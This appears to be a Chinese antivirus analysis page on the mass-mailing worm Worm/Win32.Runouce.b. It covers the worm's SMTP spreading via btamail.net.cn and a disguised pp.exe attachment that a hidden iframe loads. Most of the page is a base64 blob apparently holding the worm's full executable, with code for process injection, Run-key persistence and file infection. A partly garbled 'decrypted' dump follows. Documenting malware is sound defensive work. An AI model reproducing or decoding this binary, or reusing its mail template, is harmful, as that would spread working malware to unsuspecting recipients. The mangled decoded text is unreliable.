Worm/Win32.Runouce.b[Email]的网络行为

协议：TCP
端口：139 445
描述：通过以上端口发送恶意邮件，邮件内容：
HELO btamail.net.cn
MAIL FROM: [email protected]
RCPT TO:
DATA
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
--#BOUNDARY#
Content-Type: text/html
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-id: THE-CID
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbg
BTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAA
RAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAA
AEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAA
AACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQ
AAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAAAEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAGDo5hkAAIt0JCDoCAAAAGFoABBAAMPpWegBFgAAgeYA8P//ge4AEAAAZoE+TVp18w+3fjwD/otveAPui10g
A94zwIvWg8MEQIs7A/roDwAAAEdldFByb2NBZGRyZXNzAF4zybEP/POmddqL8otdJAPeD7cMQ4tdHAPeixyLA96B7PwAAACL/Im
0JOAAAADoXgQAAIvpVv/T/KuLzeL1iwQk6AsAAABVU0VSMzIuRExMAP/Qi/DoywYAAIvpVv/T/KuLzeL1iwQk6A0AAABBRFZBUE
kzMi5ETEwA/9CL8OgdBwAAi+lW/9P8q4vN4vWLBCToCAAAAE1QUi5ETEwA/9CL8OhcBwAAi+lW/9P8q4vN4vWLBCToDAAAAFdTT
0NLMzIuRExMAP/Qi/DofAcAAIvpVv/T/KuLzeL1i/ToEAAAAENoaW5lc2VIYWNrZXItMgBqAGoA/1YE/1YIC8B0Aszp/1YMagFQ
/1YQ6GgBAACL9OgNAAAAi/RoYOoAAP9WROvv6VnolRQAAOglCgAAjYIeAQAAiQLoDAoAAI1CLZCQkIkC6GEIAADo+gkAAI1CO5C
QkIkC6HYIAADo9AkAAI2ClwAAAIkC6NsJAACNQi2QkJCJAugwCAAA6MkJAACNQjuQkJCJAuhFCAAAi4boAAAAaGDqAABQ/1Zkg/
j/dFxW6EoAAABe6DsAAABOZXQgU2VuZCAqIE15IGdvZCEgU29tZSBvbmUga2lsbGVkIENoaW5lc2VIYWNrZXItMiBNb25pdG9yA
FhqAFD/VhDrnFnoyRMAAOhaAQAA6egAAAAAX4uGjAAAAImH/RUAAIuGlAAAAImHERYAAIuGmAAAAImHJhYAAItGRImHZhYAAI2H
vBUAAFBUagBQUGoAagD/VnSL2FiLhugAAABoYOoAAFD/VmRQagBT/1Z4WIP4/3QCzOlW6AMAAABe69lZ6E0TAADo3gAAAOlZ6EE
TAACB7AABAABU6OwGAACL/GoQV/9WcIP4/3Qdi9johRMAAGoAagBT/1Y8U+hjCwAAi/xqB1f/VihQVOguAAAAU09GVFdBUkVcTW
ljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuAGgCAACA/5agAAAAW4vE6AgAAABSdW5vbmNlAFloAAEAAFBqAWoAU
VP/lqQAAADoAAAAAF+LhqgAAACJh4QVAACLhqQAAACJh64VAACLhqwAAACJh5kVAACNh10VAABQVGoAU1BqAGoA/1Z0WDPAiYbo
AAAAgewAAQAAVOgNBgAA6AAAAABfi0ZQiYd7FQAAi0ZkiYeXFQAAi0YQiYeyFQAAi0ZIC8B0b2oBagD/0IuW4AAAAA+3WjwD2ou
LBAEAAItrVCvNgfkAAgAAckgD6o2XchUAAGpOkJCQkFVS6GQVAACNTU6QkJCL1GgAAQAAUVLoUBUAAP9WTFBUagBQVWoAagD/Vl
yJhugAAABYaPQBAAD/VkTM6WoAagD/lowAAABQVFD/logAAABqAGj/Dx8A/1ZQC8B0b4vYakBoABAAAGgAAgAAagBT/1ZoC8B0S
4vojZdyFQAAUFRqTpCQkJBSVVP/VlRYg/hOkJCQdSyL1I1NTpCQkFBUaAABAABSUVP/VlT/VkxUagBQVWoAagBT/1ZYiYboAAAA
WFP/VmBo9AEAAP9WRMzpWIvM6A4AAABHZXRTeXN0ZW1UaW1lAOgRAAAAR2V0Q29tcHV0ZXJOYW1lQQDoFAAAAFdpZGVDaGFyVG9
NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdG
VtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlA
OgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgM
AAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFN
sZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2
V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAAR
mluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQ
AAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACv
MwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQ
DoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDa
GFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvM
wekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3BlbkVudW1BACvMwek
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
wL+xorB/KrrlFP/VkCBxAABAABhycIEAMgAAABgagD/dQj/VjCD+P90cIvYgewAAQAAi/xoAAEAAFdT/1Y0PQABAAB1S4tHYGoA
UFP/VjyLT2SB+QAQAAB3NlFqRFdT/1Y0gewAAQAAi8RqAGoAaAABAABQav9XaAACAABqAP9WfFTovP7//4HEAAEAAFniyoHEAAE
AAFP/VkBhycIEAMgEAABgiWX8gewAEAAAi/z/dQhX6AoCAABQV/91EP9WOIHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIv8aA
AwAABX/3UM/1Y0g/j/dEiL1IHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIv8V1BS6AYEAABQV/91EP9WOMcEJ
A0KDQpqBFf/dRD/VjiLZfxhuAEAAADJwgwAyAgAAGCJZfzHRfgAAAAAgewAEAAAi/xUaAEBAAD/lrwAAAALwA+FSQEAAGoAagFq
Av+W1AAAAIP4/w+ELgEAAIvYZscHAgBqGf+WyAAAAGaJRwLoDwAAAGJ0YW1haWwubmV0LmNuAP+WzAAAAAvAD4TyAAAAi0AQiwC
JRwRqEFdT/5bQAAAAg/j/D4TXAAAA/3UIV+jmAAAAagBQV1P/lsQAAABooA8AAP9WRIHsABAAAIkEJIHsABAAAIkEJIHsABAAAI
kEJIv8aAAwAABX/3UM/1Y0g/j/D4SJAAAAgewAEAAAiQQkgewAEAAAiQQkgewAEAAAiQQkgewAEAAAiQQki9RSUFfo1QIAAIv8a
gBQV1P/lsQAAABooA8AAP9WROgFAAAADQouDQpYagBqBVBT/5bEAAAAaKAPAAD/VkToBgAAAFFVSVQNClhqAGoGUFP/lsQAAABo
oA8AAP9WRMdF+AEAAABT/5bYAAAA/5bAAAAAi2X8YYtF+MnCCADIBAAAYLgAAQAAK+CL1FBUUv+WgAAAAFjoHQIAAEhFTE8gYnR
hbWFpbC5uZXQuY24NCk1BSUwgRlJPTTogaW1pc3N5b3VAYnRhbWFpbC5uZXQuY24NClJDUFQgVE86ICVzDQpEQVRBDQpGUk9NOi
Alc0B5YWhvby5jb20NClRPOiAlcw0KU1VCSkVDVDogJXMgaXMgY29tbWluZyENCk1JTUUtVmVyc2lvbjogMS4wDQpDb250ZW50L
XR5cGU6IG11bHRpcGFydC9taXhlZDsgYm91bmRhcnk9IiNCT1VOREFSWSMiDQoNCi0tI0JPVU5EQVJZIw0KQ29udGVudC1UeXBl
OiB0ZXh0L2h0bWwNCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IHF1b3RlZC1wcmludGFibGUNCg0KPGh0bWw+PEhFQUQ+PC9
IRUFEPjxib2R5IGJnQ29sb3I9M0QjZmZmZmZmPjxpZnJhbWUgc3JjPTNEY2lkOlRIRS1DSUQgaGVpZ2h0PTNEMCB3aWR0aD0zRD
A+PC9pZnJhbWU+PC9ib2R5PjwvaHRtbD4NCg0KLS0jQk9VTkRBUlkjDQpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlO
iBhdWRpby94LXdhdjsgbmFtZT0icHAuZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogYmFzZTY0DQpDb250ZW50LWlk
OiBUSEUtQ0lEDQoNCgBYi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/IHEAAEAAGGLRfzJwggAyAQAAGDHRfwAAAAA6EEAAABBQkN
ERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvAF6LfRCLVQzB4gMz2z
PAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvyq/0X8695J0+CKBAb8qv9F/NHpAU38sD3886oywKphi0X8ycIMAMgAAABRUlaLd
QiLTQyL0cHqA4oUFvbRgOEH0uqA4gEKwl5aWcnCCABYUegDAAAA6zrpZGf/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKP
AmRnjwYAAFlZ/+Dp6AQAAACI/hIAWsPpyAAAAOgIAAAA6NH/////4elZi0UQiYi4AAAAM8DJwhAA6GcBAABNWlAAAQIAAwQAAQ8
AAf//AAK4AAdAAAEaACIBAAK6EAABDh+0Cc0huAFMzSGQkFRoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlciBXaW4zMg0KJD
cAiFBFAAJMAQQAAbUs74IACOAAAY6BCwECGQABAgADBgAHEAADEAADIAAEQAACEAADAgACAQAHAwABCgAGUAADBAAGAgAFEAACI
AAEEAACEAAGEAAMMAACTgAcQAACDABTQ09ERQAFEAADEAADAgADBgAOIAACYERBVEEABRAAAyAAAwIAAwgADkAAAsAuaWRhdGEA
AxAAAzAAAwIAAwoADkAAAsAucmVsb2MAAxAAA0AAAwIAAwwADkAAAlAA/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjgwAAIwMAA
WRjAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAAgwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0
fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3o
svNz/vPogDoBAAAAMbz03dYagD/EAvAdFeL2OgEAAAAmMLRd1hqBVP/EAvAdEKL2OgEAAAAruLRd1+B7AAQAABUaAAQAABqDVP/
F4HEABAAAAvAdRtUaAAQAABqDFP/F0aD5gd1CoHEAAEAAMnCBADoBAAAAEIkgHxYaPQBAAD/EOlR////6cgAAACLXQiB7AABAAC
L/OgIAAAAUnVub25jZQBeaAABAADoBAAAAOb1bnlYVFdqAGoAVlP/EFjoBAAAALj/bnlYagBqAGoEagBT/xDoBAAAAEHobnlYaA
ABAABXagFqAFZT/xDr0enIAAAA6AQAAACtaeh3WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAALTmd1hq/1P/EOgAAAAAWYPBGpCQk
OgEAAAAKnXod1hqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM
+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAAAAAA=
经解密得到数据： HELO btamail.net.cn
MAIL FROM: [email protected]
RCPT TO:
DATA
FROM: [email protected]
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary=#BOUNDARY#
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-Transfer-Encoding: base64
Content-id: THE-CID
MZP ?@ ????L?悙This program must be run under Win32 $7PEL ?饨巵 D @ ` 0N@ CODE `DATA @?idata 0 @?reloc?@? @?%00@(08000F0F0KERNEL32.dllSleep 0`桄 媡$ ?ah @瞄Y? 佹???f?MZu?穨< 䦆ox 颡] ?缷谟?@? ? GetProcAddress^3杀 ??趮骢]$ ??C媇 迡 ?迊禳孅壌$鑎 嬮V??嬐怩?$?USER32.DLL?婶?嬮V??嬐怩?$?ADVAPI32.DLL?婶?嬮V??嬐怩?$?MPR.DLL?婶鑌嬮V??嬐怩?$?WSOCK32.DLL?婶鑭嬮V??嬐怩嬼?ChineseHacker-2jj? ? 缨 涕? j P? 鑘 嬼?嬼h`?D腼閅钑 ? 崅 ?? 岯-悙悏 鉴 楮 岯;悙悏 鑦 梏 崅?枸 岯-悙悏 ? 枭 岯;悙悏 鐴 媶h`P?d凐?\V鐹^?Net Send * My god! Some one killed ChineseHacker-2 MonitorXjP? 霚Y枭 鑊 殍_媶墖?媶墖 媶墖& 婩D墖f 崌?PTjPPjj?t嬝X媶h`P?dPjS?xX凐? 涕V?^胭Y鐼 柁閅鐰 侅 T桁 孅j W?p凐? 嬝鑵 jjS?XjxPW?8S?@a陕 槿`侅 孅h W? ?4 稧< ??囋f?PE 吷崯 稯 I兠(恹;?嚤婫(+C r# C jP? ? --#BOUNDARY# MIME-Version: 1.0 Content-Type: audio/x-wav; name=pp.exe Content-Transfer-Encoding: base64 Content-id: THE-CID X孅W? W? P? ?湅鐗E鼇 a婨???`荅鐰ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/^媫 婾 菱 3?拦 燕S? ?Jt C怙? ???轿余? ????M?=??廓a婨??QRV媢 婱 嬔陵 ? 鲅?谊? 耝ZY陕 XQ??閐g?dg?????閄???dg?YY??堽 Z瞄?柩??衢Y婨 増3郎?鑗 MZP ? @ ?
&not;???L?悙This program must be run under Win32 $7圥E L ?饨 巵 @ P 0 N @ SCODE `DATA @ ?idata 0 @ ?reloc @ @ P???%00@??0 80 00 F0 F0 KERNEL32.dll Sleep? 0???G 缨 P嬆j PS?8X腱 ?G?QP嬆j PS?8XY怦胝瞄侅 3鰦黤? ??f?鲳???釆 B?纔麒 发送消息?企觲Xj?缨W嬝?樎褀Xj S?缨B嬝??褀_侅 Th j S?伳 纔 Th j S?F冩u 伳 陕 ?B$?Xh??镼??葖] 侅 孅?Runonce^h ?骢nyXTWjjVS?X??nyXjjj jS??A鑞yXh Wj jVS?胙槿?璱鑧X? jh?&not;?缨,嬝?存wXj??Y兞 悙愯 *u鑧Xj Q?陕 槿`P L$⺋兝 ?婸 ?`?埘 ??销ff廆 媢 媫 婱 帖a陕 槿`婨 jPPj?恒陕
解密之后发现该内容为PE可执行文件，病毒调用系统自带的Outlook Express发送恶意邮件，病毒利用发送恶意邮件来传播自身。
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
%Windir% 　 　 WINDODWS所在目录
%DriveLetter%　 　逻辑驱动器根目录
%ProgramFiles%　 　 　 系统程序默认安装目录
%HomeDrive% 　 当前启动的系统的所在分区
%Documents and Settings% 　当前用户文档根目录
%Temp% 　\Documents and Settings\当前用户\Local Settings\Temp
%System32% 　系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是%WINDOWS%\System
windowsXP中默认的安装路径是%system32%